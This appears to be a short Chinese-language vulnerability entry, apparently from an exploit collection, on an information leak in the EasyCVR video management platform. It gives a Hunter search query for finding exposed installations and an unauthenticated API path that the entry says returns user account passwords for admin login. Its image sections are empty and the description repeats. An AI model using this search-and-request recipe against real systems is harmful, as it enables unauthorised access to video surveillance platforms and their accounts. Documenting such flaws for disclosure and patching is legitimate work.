E1-1EasyCVR-视频管理平台-InformationLeakage
漏洞描述:
EasyCVR 视频管理平台是 TSINGSEE 青犀视频旗下一款软硬一体的产品,可提供多协议的设备接入、采集、AI 智能检测、处理、分发等服务,攻击者可通过泄露的账户密码登录后台,从而进一步攻击。
网站图片:
网络测绘:
Hunter 语法:
- hunterweb.title=“EasyCVR”
漏洞复现:
访问/api/v1/userlist?pageindex=0&pagesize=10
EasyCVR 视频管理平台是 TSINGSEE 青犀视频旗下一款软硬一体的产品,可提供多协议的设备接入、采集、AI 智能检测、处理、分发等服务,攻击者可通过泄露的账户密码登录后台,从而进一步攻击。